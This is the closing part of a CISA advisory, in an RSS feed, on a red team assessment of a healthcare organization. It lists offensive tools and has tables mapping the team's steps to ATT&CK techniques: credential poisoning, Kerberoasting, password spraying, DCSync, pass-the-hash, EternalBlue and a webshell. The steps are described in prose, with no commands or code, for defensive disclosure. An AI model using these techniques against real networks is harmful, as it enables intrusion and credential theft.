6999. <h3><strong>VALIDATE SECURITY CONTROLS</strong></h3>
7000. <p>In addition to applying the listed mitigations, CISA recommends exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA recommends testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.</p>
7001. <p>To get started:</p>
7002. <ol>
7003. <li>Select an ATT&CK technique described in this advisory (see Tables 7 – 16).</li>
7004. <li>Align your security technologies against the technique.</li>
7005. <li>Test your technologies against the technique.</li>
7006. <li>Analyze your detection and prevention technologies’ performance.</li>
7007. <li>Repeat the process for all security technologies to obtain a set of comprehensive performance data.</li>
7008. <li>Tune your security program, including people, processes, and technologies, based on the data generated by this process.</li>
7009. </ol>
7010. <p>CISA recommends continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.</p>
7011. <h3><strong>RESOURCES</strong></h3>
7012. <ul>
7013. <li>For consolidated findings from the RVAs by Fiscal Year mapped to MITRE ATT&CK, see CISA’s <a href="https://www.cisa.gov/resources-tools/resources/risk-and-vulnerability-assessments" title="Risk and Vulnerability Assessments">Risk and Vulnerability Assessments</a> page.</li>
7014. <li>See joint CSA <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-278a" title="NSA and CISA Red and Blue Teams Share Top Ten Cybersecurity Misconfigurations">NSA and CISA Red and Blue Teams Share Top Ten Cybersecurity Misconfigurations</a> for information on the most common cybersecurity misconfigurations in large organizations and TTPs actors use to exploit these misconfigurations.</li>
7015. <li>See CISA’s <a href="https://www.cisa.gov/topics/critical-infrastructure-security-and-resilience/critical-infrastructure-sectors/healthcare-and-public-health-sector" title="Healthcare and Public Health Sector">Healthcare and Public Health Sector</a> webpage.</li>
7016. <li>See CISA’s <a href="https://github.com/cisagov/RedEye/" title="cisagov / RedEye">RedEye tool on CISA’s GitHub page</a>. RedEye is an interactive open-source analytic tool used to visualize and report red team command and control activities. See CISA’s <a href="https://www.youtube.com/watch?v=b_ARIVl4BkQ" title="Redeye - Visualizing Penetration Testing Engagements">RedEye tool overview video</a> for more information.</li>
7017. </ul>
7018. <h3><strong>REFERENCES</strong></h3>
7019. <p>[1]   <a href="https://github.com/kgretzky/evilginx" title="kgretzky / evilginx">Github | kgretzky / evilginx</a><br><br>
7020. [2]   <a href="https://github.com/lgandx/Responder" title="lgandx / Responder">Github | lgandx / Responder</a><br><br>
7021. [3]   <a href="https://learn.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-security-lan-manager-authentication-level" title="Network security: LAN Manager authentication level">Network security LAN Manager authentication level - Windows Security | Microsoft Learn</a><br><br>
7022. [4]   <a href="https://learn.microsoft.com/en-us/windows/win32/ad/service-principal-names" title="Service principal names">Service principal names - Win32 apps | Microsoft Learn</a><br><br>
7023. [5]   <a href="https://github.com/fortra/impacket" title="fortra / impacket">Github | fortra / impacket</a><br><br>
7024. 6]   <a href="https://github.com/byt3bl33d3r/CrackMapExec" title="byt3bl33d3r / CrackMapExec">Github | byt3bl33d3r / CrackMapExec</a><br><br>
7025. [7]   <a href="https://github.com/ly4k/Certipy" title="ly4k / Certipy">Github | ly4k / Certipy</a><br><br>
7026. [8]   <a href="https://github.com/topotam/PetitPotam" title="topotam / PetitPotam">Github | topotam / PetitPotam</a><br><br>
7027. [9]   <a href="https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py" title="fortra / impacket / examples">Github | fortra / impacket / examples</a><br><br>
7028. [10] <a href="https://github.com/login-securite/DonPAPI" title="login-securite / DonPAPI">Github | login-securite / DonPAPI</a><br><br>
7029. [11] <a href="https://csrc.nist.gov/pubs/sp/800/63/b/upd2/final" title="Digital Identity Guidelines: Authentication and Lifecycle Management">SP 800-63B, Digital Identity Guidelines: Authentication and Lifecycle Management | CSRC (nist.gov)</a></p>
7030. <h3><strong>APPENDIX: MITRE ATT&CK TACTICS AND TECHNIQUES</strong></h3>
7031. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
7032. <caption><em>Table 7: CISA Team ATT&CK Techniques for Reconnaissance</em></caption>
7033. <thead>
7034. <tr>
7035. <th scope="col" role="columnheader" data-tablesaw-priority="persist">
7036. <p><strong>Reconnaissance</strong></p>
7037. </th>
7038. <th scope="col" role="columnheader"> </th>
7039. <th scope="col" role="columnheader"> </th>
7040. </tr>
7041. </thead>
7042. <tbody>
7043. <tr>
7044. <th role="columnheader">
7045. <p><strong>Technique Title</strong></p>
7046. </th>
7047. <th role="columnheader">
7048. <p><strong>ID</strong></p>
7049. </th>
7050. <th role="columnheader">
7051. <p><strong>Use</strong></p>
7052. </th>
7053. </tr>
7054. <tr>
7055. <td>
7056. <p>Active Scanning: Scanning IP Blocks</p>
7057. </td>
7058. <td>
7059. <p><a href="https://attack.mitre.org/versions/v14/techniques/T1595/001/" title="Active Scanning: Scanning IP Blocks">T1595.001</a></p>
7060. </td>
7061. <td>
7062. <p>The CISA team first mapped the network to identify open web ports.</p>
7063. </td>
7064. </tr>
7065. </tbody>
7066. </table>
7067. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
7068. <caption><em>Table 8: CISA Team ATT&CK Techniques for Initial Access</em></caption>
7069. <thead>
7070. <tr>
7071. <th scope="col" role="columnheader" data-tablesaw-priority="persist">
7072. <p><strong>Initial Access</strong></p>
7073. </th>
7074. <th scope="col" role="columnheader"> </th>
7075. <th scope="col" role="columnheader"> </th>
7076. </tr>
7077. </thead>
7078. <tbody>
7079. <tr>
7080. <td>
7081. <p><strong>Technique Title</strong></p>
7082. </td>
7083. <td>
7084. <p><strong>ID</strong></p>
7085. </td>
7086. <td>
7087. <p><strong>Use</strong></p>
7088. </td>
7089. </tr>
7090. <tr>
7091. <td>
7092. <p>Valid Accounts: Default Accounts</p>
7093. </td>
7094. <td>
7095. <p><a href="https://attack.mitre.org/versions/v14/techniques/T1078/001/" title="Valid Accounts: Default Accounts">T1078.001</a></p>
7096. </td>
7097. <td>
7098. <p>The CISA team did identify default credentials for multiple web interfaces during web application testing and used default printer credentials while penetration testing.</p>
7099. </td>
7100. </tr>
7101. <tr>
7102. <td>
7103. <p>External Remote Services</p>
7104. </td>
7105. <td>
7106. <p><a href="https://attack.mitre.org/versions/v14/techniques/T1133/" title="External Remote Services">T1133</a></p>
7107. </td>
7108. <td>
7109. <p>The CISA team attempted to access various web interfaces with default administrator credentials.</p>
7110. </td>
7111. </tr>
7112. </tbody>
7113. </table>
7114. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
7115. <caption><em>Table 9: CISA Team ATT&CK Techniques for Execution</em></caption>
7116. <thead>
7117. <tr>
7118. <th scope="col" role="columnheader" data-tablesaw-priority="persist">
7119. <p><strong>Execution</strong></p>
7120. </th>
7121. <th scope="col" role="columnheader"> </th>
7122. <th scope="col" role="columnheader"> </th>
7123. </tr>
7124. </thead>
7125. <tbody>
7126. <tr>
7127. <th role="columnheader">
7128. <p><strong>Technique Title</strong></p>
7129. </th>
7130. <th role="columnheader">
7131. <p><strong>ID</strong></p>
7132. </th>
7133. <th role="columnheader">
7134. <p><strong>Use</strong></p>
7135. </th>
7136. </tr>
7137. <tr>
7138. <td>
7139. <p>Command-Line Interface</p>
7140. </td>
7141. <td>
7142. <p><a href="https://attack.mitre.org/versions/v14/techniques/T1059/" title="Command-Line Interface">T1059</a></p>
7143. </td>
7144. <td>
7145. <p>The CISA team accessed a virtual machine interface enabling them to modify, power off, and/or delete critical virtual machines including domain controllers, file servers, and servers.</p>
7146. </td>
7147. </tr>
7148. <tr>
7149. <td>
7150. <p>Command and Scripting Interpreter: Windows Command Shell</p>
7151. </td>
7152. <td>
7153. <p><a href="https://attack.mitre.org/versions/v14/techniques/T1059/003/" title="Command and Scripting Interpreter: Windows Command Shell">T1059.003</a></p>
7154. </td>
7155. <td>
7156. <p>The CISA team used a webshell that allowed them to execute commands under the context of the local <code>SYSTEM</code> account.</p>
7157. </td>
7158. </tr>
7159. </tbody>
7160. </table>
7161. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
7162. <caption><em>Table 10: CISA Team ATT&CK Techniques for Privilege Escalation</em></caption>
7163. <thead>
7164. <tr>
7165. <th scope="col" role="columnheader" data-tablesaw-priority="persist">
7166. <p><strong>Privilege Escalation</strong></p>
7167. </th>
7168. <th scope="col" role="columnheader"> </th>
7169. <th scope="col" role="columnheader"> </th>
7170. </tr>
7171. </thead>
7172. <tbody>
7173. <tr>
7174. <th role="columnheader">
7175. <p><strong>Technique Title</strong></p>
7176. </th>
7177. <th role="columnheader">
7178. <p><strong>ID</strong></p>
7179. </th>
7180. <th role="columnheader">
7181. <p><strong>Use</strong></p>
7182. </th>
7183. </tr>
7184. <tr>
7185. <td>
7186. <p>Valid Accounts: Domain Accounts</p>
7187. </td>
7188. <td>
7189. <p><a href="https://attack.mitre.org/versions/v14/techniques/T1078/002/" title="Valid Accounts: Domain Accounts">T1078.002</a></p>
7190. </td>
7191. <td>
7192. <p>The CISA team used CrackMapExec to use ACCOUNT 1 to successfully connect to a domain controller (DC).</p>
7193. </td>
7194. </tr>
7195. </tbody>
7196. </table>
7197. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
7198. <caption><em>Table 11: CISA Team ATT&CK Techniques for Defense Evasion</em></caption>
7199. <thead>
7200. <tr>
7201. <th scope="col" role="columnheader" data-tablesaw-priority="persist">
7202. <p><strong>Defense Evasion</strong></p>
7203. </th>
7204. <th scope="col" role="columnheader"> </th>
7205. <th scope="col" role="columnheader"> </th>
7206. </tr>
7207. </thead>
7208. <tbody>
7209. <tr>
7210. <th role="columnheader">
7211. <p><strong>Technique Title</strong></p>
7212. </th>
7213. <th role="columnheader">
7214. <p><strong>ID</strong></p>
7215. </th>
7216. <th role="columnheader">
7217. <p><strong>Use</strong></p>
7218. </th>
7219. </tr>
7220. <tr>
7221. <td>
7222. <p>Use Alternate Authentication Material</p>
7223. </td>
7224. <td>
7225. <p><a href="https://attack.mitre.org/versions/v14/techniques/T1550/" title="Use Alternate Authentication Material">T1550</a></p>
7226. </td>
7227. <td>
7228. <p>The CISA team authenticated to the domain controller as ACCOUNT 3 with the generated certificate.</p>
7229. </td>
7230. </tr>
7231. </tbody>
7232. </table>
7233. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
7234. <caption><em>Table 12: CISA Team ATT&CK Techniques for Credential Access</em></caption>
7235. <thead>
7236. <tr>
7237. <th scope="col" role="columnheader" data-tablesaw-priority="persist">
7238. <p><strong>Credential Access</strong></p>
7239. </th>
7240. <th scope="col" role="columnheader"> </th>
7241. <th scope="col" role="columnheader"> </th>
7242. </tr>
7243. </thead>
7244. <tbody>
7245. <tr>
7246. <th role="columnheader">
7247. <p><strong>Technique Title</strong></p>
7248. </th>
7249. <th role="columnheader">
7250. <p><strong>ID</strong></p>
7251. </th>
7252. <th role="columnheader">
7253. <p><strong>Use</strong></p>
7254. </th>
7255. </tr>
7256. <tr>
7257. <td>
7258. <p>LLMNR/NBT-NS Poisoning and Relay</p>
7259. </td>
7260. <td>
7261. <p><a href="https://attack.mitre.org/versions/v14/techniques/T1557/001/" title="Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay">T1557.001</a></p>
7262. </td>
7263. <td>
7264. <p>The CISA team initiated a LLMNR/NBT-NS/mDNS/DHCP poisoning tool to spoof a connection to the organization’s server for forced access.</p>
7265. </td>
7266. </tr>
7267. <tr>
7268. <td>
7269. <p>Brute Force: Password Cracking</p>
7270. </td>
7271. <td>
7272. <p><a href="https://attack.mitre.org/versions/v14/techniques/T1110/002/" title="Brute Force: Password Cracking">T1110.002</a></p>
7273. </td>
7274. <td>
7275. <p>The CISA team cracked a service account with a weak password, giving them access to it.</p>
7276. </td>
7277. </tr>
7278. <tr>
7279. <td>
7280. <p>Steal or Forge Kerberos Tickets: Kerberoasting</p>
7281. </td>
7282. <td>
7283. <p><a href="https://attack.mitre.org/versions/v14/techniques/T1558/003/" title="Steal or Forge Kerberos Tickets: Kerberoasting">T1558.003</a></p>
7284. </td>
7285. <td>
7286. <p>The CISA team gained access to domain accounts because any domain user can request a TGS ticket for domain accounts.</p>
7287. </td>
7288. </tr>
7289. <tr>
7290. <td>
7291. <p>Adversary-in-the-Middle</p>
7292. </td>
7293. <td>
7294. <p><a href="https://attack.mitre.org/versions/v14/techniques/T1557/001/" title="Adversary-in-the-Middle">T1557</a></p>
7295. </td>
7296. <td>
7297. <p>The CISA team modified the “Save as file” configuration, to use File Transfer Protocol (FTP) instead of Server Message Block (SMB) and changed the Server Name and Network Path to point to a CISA-controlled machine running Responder.</p>
7298. </td>
7299. </tr>
7300. <tr>
7301. <td>
7302. <p>Forced Authentication</p>
7303. </td>
7304. <td>
7305. <p><a href="https://attack.mitre.org/versions/v14/techniques/T1187/" title="Forced Authentication">T1187</a></p>
7306. </td>
7307. <td>
7308. <p>The CISA team executed a “Connection Test” that sent the username and password over FTP.</p>
7309. </td>
7310. </tr>
7311. <tr>
7312. <td>
7313. <p>Steal or Forge Authentication Certificates</p>
7314. </td>
7315. <td>
7316. <p><a href="https://attack.mitre.org/versions/v14/techniques/T1649/" title="Steal or Forge Authentication Certificates">T1649</a></p>
7317. </td>
7318. <td>
7319. <p>The CISA team used <code>Certipy</code> to enumerate the ADCS certificate template vulnerabilities, allowing them to obtain certificates for different users.</p>
7320. </td>
7321. </tr>
7322. <tr>
7323. <td>
7324. <p>OS Credential Dumping</p>
7325. </td>
7326. <td>
7327. <p><a href="https://attack.mitre.org/versions/v14/techniques/T1003/" title="OS Credential Dumping">T1003</a></p>
7328. </td>
7329. <td>
7330. <p>The CISA team retrieved the NTLM hash for ACCOUNT 3.</p>
7331. </td>
7332. </tr>
7333. <tr>
7334. <td>
7335. <p>Use Alternate Authentication Material: Pass the Hash</p>
7336. </td>
7337. <td>
7338. <p><a href="https://attack.mitre.org/versions/v14/techniques/T1550/002/" title="Use Alternate Authentication Material: Pass the Hash">T1550.002</a></p>
7339. </td>
7340. <td>
7341. <p>The CISA team used the hash to authenticate to the domain controller and validated Domain Administrator privileges, demonstrating compromise of the domain.</p>
7342. </td>
7343. </tr>
7344. <tr>
7345. <td>
7346. <p>Brute Force: Password Spraying</p>
7347. </td>
7348. <td>
7349. <p><a href="https://attack.mitre.org/versions/v14/techniques/T1110/003" title="Brute Force: Password Spraying">T1110.003</a></p>
7350. </td>
7351. <td>
7352. <p>The CISA team used a tool called <code>CrackMapExec</code> to spray easily guessable passwords across all domain accounts, giving them two sets of valid credentials.</p>
7353. </td>
7354. </tr>
7355. <tr>
7356. <td>
7357. <p>Steal or Forge Kerberos Tickets</p>
7358. </td>
7359. <td>
7360. <p><a href="https://attack.mitre.org/versions/v14/techniques/T1558/003/" title="Steal or Forge Kerberos Tickets">T1558</a></p>
7361. </td>
7362. <td>
7363. <p>The CISA team used this certificate to acquire a TGT for ACCOUNT 5.</p>
7364. </td>
7365. </tr>
7366. <tr>
7367. <td>
7368. <p>OS Credential Dumping: DCSync</p>
7369. </td>
7370. <td>
7371. <p><a href="https://attack.mitre.org/versions/v14/techniques/T1003/006" title="OS Credential Dumping: DCSync">T1003.006</a></p>
7372. </td>
7373. <td>
7374. <p>The CISA team used <code>DCSync</code> to dump the NTLM hash for ACCOUNT 3 (a Domain Administrator account), effectively leading to domain compromise.</p>
7375. </td>
7376. </tr>
7377. <tr>
7378. <td>
7379. <p>OS Credential Dumping: Security Account Manager</p>
7380. </td>
7381. <td>
7382. <p><a href="https://attack.mitre.org/versions/v14/techniques/T1003/002/" title="OS Credential Dumping: Security Account Manager">T1003.002</a></p>
7383. </td>
7384. <td>
7385. <p>The CISA team dumped password hashes from a Security Account Manager (SAM) database.</p>
7386. </td>
7387. </tr>
7388. </tbody>
7389. </table>
7390. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
7391. <caption><em>Table 13: CISA Team ATT&CK Techniques for Discovery</em></caption>
7392. <thead>
7393. <tr>
7394. <th scope="col" role="columnheader" data-tablesaw-priority="persist">
7395. <p><strong>Discovery</strong></p>
7396. </th>
7397. <th scope="col" role="columnheader"> </th>
7398. <th scope="col" role="columnheader"> </th>
7399. </tr>
7400. </thead>
7401. <tbody>
7402. <tr>
7403. <th role="columnheader">
7404. <p><strong>Technique Title</strong></p>
7405. </th>
7406. <th role="columnheader">
7407. <p><strong>ID</strong></p>
7408. </th>
7409. <th role="columnheader">
7410. <p><strong>Use</strong></p>
7411. </th>
7412. </tr>
7413. <tr>
7414. <td>
7415. <p>Network Sniffing</p>
7416. </td>
7417. <td>
7418. <p><a href="https://attack.mitre.org/versions/v14/techniques/T1040/" title="Network Sniffing">T1040</a></p>
7419. </td>
7420. <td>
7421. <p>The CISA team spoofed a response to direct the victim host to a CISA-controlled machine on which Responder is running. </p>
7422. </td>
7423. </tr>
7424. <tr>
7425. <td>
7426. <p>Account Discovery: Domain Account</p>
7427. </td>
7428. <td>
7429. <p><a href="https://attack.mitre.org/versions/v14/techniques/T1087/002/" title="Account Discovery: Domain Account">T1087.002</a></p>
7430. </td>
7431. <td>
7432. <p>The CISA team enumerated accounts with a Service Principal Name (SPN) set with their domain access.</p>
7433. </td>
7434. </tr>
7435. <tr>
7436. <td>
7437. <p>Network Service Scanning</p>
7438. </td>
7439. <td>
7440. <p><a href="https://attack.mitre.org/versions/v14/techniques/T1046/" title="Network Service Scanning">T1046</a></p>
7441. </td>
7442. <td>
7443. <p>The CISA team canned the organization’s network to identify open web ports to see where they could leverage the default credentials they had.</p>
7444. </td>
7445. </tr>
7446. </tbody>
7447. </table>
7448. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
7449. <caption><em>Table 14: CISA Team ATT&CK Techniques for Lateral Movement</em></caption>
7450. <thead>
7451. <tr>
7452. <th scope="col" role="columnheader" data-tablesaw-priority="persist">
7453. <p><strong>Lateral Movement</strong></p>
7454. </th>
7455. <th scope="col" role="columnheader"> </th>
7456. <th scope="col" role="columnheader"> </th>
7457. </tr>
7458. </thead>
7459. <tbody>
7460. <tr>
7461. <th role="columnheader">
7462. <p><strong>Technique Title</strong></p>
7463. </th>
7464. <th role="columnheader">
7465. <p><strong>ID</strong></p>
7466. </th>
7467. <th role="columnheader">
7468. <p><strong>Use</strong></p>
7469. </th>
7470. </tr>
7471. <tr>
7472. <td>
7473. <p>Remote Services</p>
7474. </td>
7475. <td>
7476. <p><a href="https://attack.mitre.org/versions/v14/techniques/T1021/" title="Remote Services">T1021</a></p>
7477. </td>
7478. <td>
7479. <p>The CISA team exploited its Responder to perform malicious functions, such as stealing credentials or opening a session on a targeted host.</p>
7480. </td>
7481. </tr>
7482. <tr>
7483. <td>
7484. <p> SMB/Windows Admin Shares</p>
7485. </td>
7486. <td>
7487. <p><a href="https://attack.mitre.org/versions/v14/techniques/T1021/002/" title=" SMB/Windows Admin Shares">T1021.002</a></p>
7488. </td>
7489. <td>
7490. <p>The CISA team confirmed they compromised the domain because ACCOUNT 1 had <code>READ,WRITE</code> permissions over the <code>C$</code> administrative share.</p>
7491. </td>
7492. </tr>
7493. <tr>
7494. <td>
7495. <p>Taint Shared Content</p>
7496. </td>
7497. <td>
7498. <p><a href="https://attack.mitre.org/versions/v14/techniques/T1080/" title="Taint Shared Content">T1080</a></p>
7499. </td>
7500. <td>
7501. <p>The CISA team found the device was configured with domain credentials to allow employees to save scanned documents to a network share.</p>
7502. </td>
7503. </tr>
7504. <tr>
7505. <td>
7506. <p>Exploitation of Remote Services</p>
7507. </td>
7508. <td>
7509. <p><a href="https://attack.mitre.org/versions/v14/techniques/T1210/" title="Exploitation of Remote Services">T1210</a></p>
7510. </td>
7511. <td>
7512. <p>The CISA team then executed a well-known EternalBlue exploit and established a shell on the server.</p>
7513. </td>
7514. </tr>
7515. </tbody>
7516. </table>
7517. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
7518. <caption><em>Table 15: CISA Team ATT&CK Techniques for Collection</em></caption>
7519. <thead>
7520. <tr>
7521. <th scope="col" role="columnheader" data-tablesaw-priority="persist">
7522. <p><strong>Collection</strong></p>
7523. </th>
7524. <th scope="col" role="columnheader"> </th>
7525. <th scope="col" role="columnheader"> </th>
7526. </tr>
7527. </thead>
7528. <tbody>
7529. <tr>
7530. <th role="columnheader">
7531. <p><strong>Technique Title</strong></p>
7532. </th>
7533. <th role="columnheader">
7534. <p><strong>ID</strong></p>
7535. </th>
7536. <th role="columnheader">
7537. <p><strong>Use</strong></p>
7538. </th>
7539. </tr>
7540. <tr>
7541. <td>
7542. <p>Data from Network Shared Drive</p>
7543. </td>
7544. <td>
7545. <p><a href="https://attack.mitre.org/versions/v14/techniques/T1039/" title="Data from Network Shared Drive">T1039</a></p>
7546. </td>
7547. <td>
7548. <p>The CISA team obtained credentials for cleartext, hashes, and from files.</p>
7549. </td>
7550. </tr>
7551. </tbody>
7552. </table>
7553. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
7554. <caption><em>Table 16: CISA Team ATT&CK Techniques for Impact</em></caption>
7555. <thead>
7556. <tr>
7557. <th scope="col" role="columnheader" data-tablesaw-priority="persist">
7558. <p><strong>Collection</strong></p>
7559. </th>
7560. <th scope="col" role="columnheader"> </th>
7561. <th scope="col" role="columnheader"> </th>
7562. </tr>
7563. </thead>
7564. <tbody>
7565. <tr>
7566. <th role="columnheader">
7567. <p><strong>Technique Title</strong></p>
7568. </th>
7569. <th role="columnheader">
7570. <p><strong>ID</strong></p>
7571. </th>
7572. <th role="columnheader">
7573. <p><strong>Use</strong></p>
7574. </th>
7575. </tr>
7576. <tr>
7577. <td>
7578. <p>System Shutdown/Reboot</p>
7579. </td>
7580. <td>
7581. <p><a href="https://attack.mitre.org/versions/v14/techniques/T1529/" title="System Shutdown/Reboot">T1529</a></p>
7582. </td>
7583. <td>
7584. <p>The CISA team assessed that with ACCOUNT 1, they could use it to modify, power off, and/or delete critical virtual machines, including domain controllers and file servers.</p>
7585. </td>
7586. </tr>
7587. </tbody>
7588. </table>
7589. <h3><strong>VERSION HISTORY</strong></h3>
7590. <p>December 14, 2023: Initial version.</p>
7591. </description>
7592.  <pubDate>Wed, 13 Dec 2023 19:24:48 EST</pubDate>
7593.    <dc:creator>CISA</dc:creator>
7594.    <guid isPermaLink="false">/node/20506</guid>
7595.    </item>
7596.  
7597.  </channel>
7598. </rss>
7599.